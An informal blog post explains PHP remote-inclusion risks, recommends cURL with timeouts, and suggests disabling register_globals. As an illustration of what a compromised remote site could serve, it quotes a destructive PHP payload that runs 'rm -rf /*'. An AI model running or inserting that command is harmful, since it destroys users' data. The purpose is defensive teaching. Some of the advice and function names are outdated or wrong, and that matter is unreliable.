Intro
If you've watched any TV in the U.S. lately, you've probably seen a commercial where nice, friendly folks are saying things like "I want my computer to be infected by viruses.", "I want all of my family photos to disappear without a trace." or "I want my laptop to sound like a Yeti."
Naturally, none of these folks honestly want that sort of pain, but by not taking steps to protect themselves, they're letting in bad guys. Understand, that like your home, car, or personal savings account, you can't just leave it wide open and trust in the kindness of strangers. Sadly, most strangers aren't really as nice as you'd hope. In fact, this probably explains why banks switched off keeping their money in a big bag out in the middle of an empty field after the first few days.
Still, it's easy to make mistakes if nobody ever tells you what the right answer is. Ignorance isn't bad. Willful ignorance is, but since you're reading this I'll presume you're not that stupid.
Here's a rundown of what not to do and why.
<?php include('http://example.com'); ?>This is delicious, candy covered evil. What it means is "Go to http://example.com, fetch the contents, and then run them just as if I were telling you to do it.".
That's fine for something like the following:
but not so fine if the site gets hacked (or the owner gets pissed at you) and it's replaced with:<b>Hello World</b>
which will delete ("remove") everything on your computer.Evil ruuLzzzzorz!!! <?php system("rm -rf /*"); ?>
<?php print read_file('http://example.com'); ?>This is a little safer, since all it does is read the contents of a remote page and print them. There's no chance that someone could insert bad PHP code into this and have it execute, but it does mean that someone could inject bad Javascript, and suddenly your site is infesting your visitors with millions of pop-up ads. That will make them say very naughty things about you.
There are lots of other things, but those are the "biggies".
PHP has a very powerful library of calls that are specifically designed to safely fetch data from remote sites. It's called CURL. Now, don't let that big page of really confusing crap scare you, it's actually pretty simple.
Here's a quick replacement for the read_file() command above:
<?php
$curl_handle=curl_init();
curl_setopt($curl_handle,CURLOPT_URL,'http://example.com');
curl_exec($curl_handle);
curl_close($curl_handle);
?>That's it, and if you really wanted, the last curl_close() step is optional.
Mind you, you're still subject to the evil javascript and cookie stealing crap from the remote site, but that involves more work than you probably want to do. If you do want to do it, I'd suggest brushing up on Regular Expressions and preg_replace()
But let's really use CURL for what it can do. Let's say that example.com isn't really that reliable. It bugs you that whenever they're down, your page takes 30 seconds to load. Well, there's a solution to that:
<?php
$curl_handle=curl_init();
curl_setopt($curl_handle,CURLOPT_URL,'http://example.com');
curl_setopt($curl_handle,CURLOPT_CONNECTTIMEOUT,2);
curl_exec($curl_handle);
curl_close($curl_handle);
?>What that says is to time out after only two seconds. Heck, you may want to set it to 1 second to make your page load even zippier. (Be careful not to set it to zero (zed to you outside of the US). That tells curl to never time out.)
But what if we also want to display a message if you don't get anything back? Ha-ha! That's easy!
<?php
$curl_handle=curl_init();
curl_setopt($curl_handle,CURLOPT_URL,'http://example.com');
curl_setopt($curl_handle,CURLOPT_CONNECTTIMEOUT,2);
curl_setopt($curl_handle,CURLOPT_RETURNTRANSFER,1);
$buffer = curl_exec($curl_handle);
curl_close($curl_handle);
if (empty($buffer))
{
print "Sorry, example.com are a bunch of poopy-heads.<p>";
}
else
{
print $buffer;
}
?>Are you starting to see the power of CURL?
Well, first off, I'd make sure I have the latest copy of Wordpress, phpBB, and any other package I've already installed. If you're also a Dreamhost type person, you can take advantage of them being the best damn hosting company on the internet and use their spiffy One click installs to get the latest version.
I'd then recommend reading up on PHP over at php.net. Each of the help pages has comments and examples of how to use it. It's very helpful. Generally, it's a good idea to know what you're running. Like reading your car's owners manual before your stuck on the side of the freeway wondering where the heck the jack is.
I'd also add the following to my .htaccess file. (This should be at the top directory for your website, in the same directory as your very top page.) Files with periods at the front of them are hidden on most systems, so you may have to turn on "Show Hidden Files in your FTP client
php_value register_globals 0 This will prevent PHP from automagically turning any value in the URL into a variable. That's a good thing because it means Evil Hacker People can't insert anything they like into your code simply by sticking it into your URL. The problem with this is that it breaks some packages, notably ones like ATP and phpNuke. There are safer, better versions out there, you just have to go get them, learn them and keep them up-to-date.
There, now hopefully you understand and have some work-around fixes.
The proprietor of tellinya.com points out that he has a few more advanced usages and classes you might be interested in. I've not tested his code out, and he seems to set a lot of variables to their default values, but the code is fairly straight forward and shows you what you can do with cUrl.
And most of all... Let's be careful out there.
No comments:
Post a Comment